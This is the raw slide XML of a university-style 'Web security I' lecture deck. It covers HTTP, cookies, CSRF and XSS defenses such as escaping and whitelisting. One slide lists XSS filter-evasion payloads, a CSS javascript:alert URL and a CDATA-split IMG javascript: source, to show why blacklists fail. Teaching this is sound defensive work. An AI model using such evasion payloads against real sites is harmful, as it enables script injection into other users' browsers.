      <p:bldP spid="466" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="469" grpId="0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XSS Defense: Filter/Escap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7040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>XSS Defense: Filter/Escape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943" name="Typical defense is sanitizing: remove executable portions of user-provided content…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723509" y="2609850"/>
            <a:ext cx="11557781" cy="6286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Typical defense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sanitizing</a:t>
            </a:r>
            <a:r>
              <a:t>: remove executable portions of user-provided content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800"/>
            </a:pP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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr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 ...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&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> or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&lt;javascript&gt;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...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&lt;/javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Libraries exist for this purpose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" grpId="1" build="p" bldLvl="5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Did you find everythi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Did you find everything?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Bad guys are inventive: lots of ways to introduce Javascript; e.g., CSS tags and XML-encoded data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Bad guys are inventive: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lots</a:t>
            </a:r>
            <a:r>
              <a:t> of ways to introduce Javascript; e.g., CSS tags and XML-encoded data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="691444" lvl="1" indent="-246944"/>
            <a:r>
              <a:rPr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&lt;div style="background-image: url(javascript:alert(’JavaScript’))"&gt;...&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754303" lvl="1" indent="-309803">
              <a:defRPr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&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert(’XSS’);"&gt;]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Worse: browsers “help” by parsing broken HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Samy figured out that IE permits javascript tag to be split across two lines; evaded MySpace filter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" grpId="1" build="p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Better defense: White li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r>
              <a:t>Better defense: White list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Instead of trying to sanitize, validate al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807"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Instead of trying to sanitize, validate all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headers,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cookies,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query strings,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form fields, and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hidden fields (i.e., all parameters) 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rPr dirty="0"/>
              <a:t>… against a rigorous spec of what should be allowed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1" build="p" bldLvl="5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XSS vs. CSR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XSS vs. CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="Do not confuse the two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Do not confuse the two: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XSS exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:t> a client browser has in data sent from the legitimate website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So the attacker tries to control what the website sends to the client browser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CSRF exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:t> a legitimate website has in data sent from the client browser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So the attacker tries to control what the client browser sends to the website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" grpId="1" build="p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Input validation, ad infinit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Input validation, ad infinitum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Many other web-based bugs, ultimately due to trusting external input (too much)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226821" cy="5588000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Many other web-based bugs, ultimately due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trusting external input</a:t>
            </a:r>
            <a:r>
              <a:t> (too much)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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3866" y="2646591"/>
            <a:ext cx="5529734" cy="6082708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="http://www.jantoo.com/cartoon/08336711"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761388" y="9253271"/>
            <a:ext cx="383408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http://www.jantoo.com/cartoon/08336711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" grpId="1" build="p" bldLvl="5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Takeaways: Verify before tru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Takeaways: Verify before trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Improperly validated input causes many attacks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5690524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Improperly validated input causes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many</a:t>
            </a:r>
            <a:r>
              <a:t> attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Common to solutions: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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check</a:t>
            </a:r>
            <a:r>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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sanitize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all data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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:t>: More secure than blacklisting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Checking</a:t>
            </a:r>
            <a:r>
              <a:t>: More secure than sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Proper sanitization is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hard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All data</a:t>
            </a:r>
            <a:r>
              <a:t>: Are you sure you found all inputs?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Don’t roll your own: libraries, frameworks,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Basic structure of web traff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Basic</a:t>
            </a:r>
            <a:r>
              <a:t> structure of web traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114815" y="3071952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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949999" y="3071952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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488517" y="2434373"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251806" y="2434373"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023594" y="3786327"/>
            <a:ext cx="2957613" cy="1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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="483" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2859358" y="2994746"/>
            <a:ext cx="7286085" cy="3347358"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7286084" cy="3347356"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="477" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2450901" cy="3347357"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13333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8" name="Database"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5346258" y="2231928"/>
              <a:ext cx="1428751" cy="1032570"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18449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Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="479" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4835183" y="0"/>
              <a:ext cx="2450902" cy="3347357"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13333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0" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6060633" y="1562055"/>
              <a:ext cx="1" cy="6137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481" name="(Private)…"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511075" y="2231928"/>
              <a:ext cx="1428751" cy="1032570"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18449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r>
                <a:t>(Private)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="482" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1225450" y="1562055"/>
              <a:ext cx="1" cy="6137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484" name="HyperText Transfer Protocol (HTTP)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645133" y="7280336"/>
            <a:ext cx="11714535" cy="123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419805" indent="-419805" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>HyperText Transfer Protocol (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HTTP</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="767772" lvl="1" indent="-323272" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>An “application-layer” protocol for exchanging data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="HTTP"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894269" y="3220043"/>
            <a:ext cx="121626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2990579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 animBg="1" advAuto="0"/>
      <p:bldP spid="484" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="48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Basic structure of web traff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Basic</a:t>
            </a:r>
            <a:r>
              <a:t> structure of web traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114815" y="3071952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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949999" y="3071952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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488517" y="2434373"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251806" y="2434373"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="494" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5023594" y="3134480"/>
            <a:ext cx="2957613" cy="651848"/>
            <a:chOff x="0" y="-55562"/>
            <a:chExt cx="2957612" cy="651846"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="492" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="596284"/>
              <a:ext cx="29576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493" name="HTTP Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="42448" y="-55563"/>
              <a:ext cx="28727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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="User clicks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900031" y="4541382"/>
            <a:ext cx="236955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User clicks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Requests contain:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687414" y="5508030"/>
            <a:ext cx="11629972" cy="366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369428" indent="-369428" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>Requests contain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="675640" lvl="1" indent="-284480" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3168"/>
            </a:pPr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URL</a:t>
            </a:r>
            <a:r>
              <a:t> of the resource the client wishes to obtain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="675640" lvl="1" indent="-284480" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="316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Headers</a:t>
            </a:r>
            <a:r>
              <a:t> describing what the browser can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="369428" indent="-369428" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>Request types can be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GET</a:t>
            </a:r>
            <a:r>
              <a:t> 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POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="675640" lvl="1" indent="-284480" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3168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GET</a:t>
            </a:r>
            <a:r>
              <a:t>: all data is in the URL itself </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="675640" lvl="1" indent="-284480" algn="l" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3168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POST</a:t>
            </a:r>
            <a:r>
              <a:t>: includes the data as separate fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14215359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 advAuto="0"/>
      <p:bldP spid="495" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="49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HTTP GET reque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 GET requests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895600"/>
            <a:ext cx="914146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3354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HTTP POST reque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 POST requests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609850"/>
            <a:ext cx="840226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7421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2460</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>475</Paragraphs>
  <Slides>55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White</vt:lpstr>
      <vt:lpstr>Web security I</vt:lpstr>
      <vt:lpstr>Web Basics</vt:lpstr>
      <vt:lpstr>The web, basically</vt:lpstr>
      <vt:lpstr>Interacting with web servers</vt:lpstr>
      <vt:lpstr>Interacting with web servers</vt:lpstr>
      <vt:lpstr>Basic structure of web traffic</vt:lpstr>
      <vt:lpstr>Basic structure of web traffic</vt:lpstr>
      <vt:lpstr>HTTP GET requests</vt:lpstr>
      <vt:lpstr>HTTP POST requests</vt:lpstr>
      <vt:lpstr>Basic structure of web traffic</vt:lpstr>
      <vt:lpstr>HTTP responses</vt:lpstr>
      <vt:lpstr>Adding state to the web</vt:lpstr>
      <vt:lpstr>HTTP is stateless</vt:lpstr>
      <vt:lpstr>Maintaining State</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Solution: Capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>Statefulness with Cookies</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookies are key-value pairs</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Requests with cookies</vt:lpstr>
      <vt:lpstr>Why use cookies?</vt:lpstr>
      <vt:lpstr>Why use cookies?</vt:lpstr>
      <vt:lpstr>URLs with side effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side effects</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Variation: Login CSRF</vt:lpstr>
      <vt:lpstr>Defense: Secret token</vt:lpstr>
      <vt:lpstr>Defense: Referer validation</vt:lpstr>
      <vt:lpstr>Dynamic web pages</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Javascript</vt:lpstr>
      <vt:lpstr>What could go wrong?</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS Summary</vt:lpstr>
      <vt:lpstr>Your friend and mine, Samy</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Reflected XSS Summary</vt:lpstr>
      <vt:lpstr>XSS Defense: Filter/Escape</vt:lpstr>
      <vt:lpstr>Did you find everything?</vt:lpstr>
      <vt:lpstr>Better defense: White list</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>Input validation, ad infinitum</vt:lpstr>
      <vt:lpstr>Takeaways: Verify before trust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II</dc:title>
  <dc:creator>Dachman</dc:creator>
  <cp:lastModifiedBy>Dachman</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-28T02:19:38Z</dcterms:modified>
</cp:coreProperties>
</file>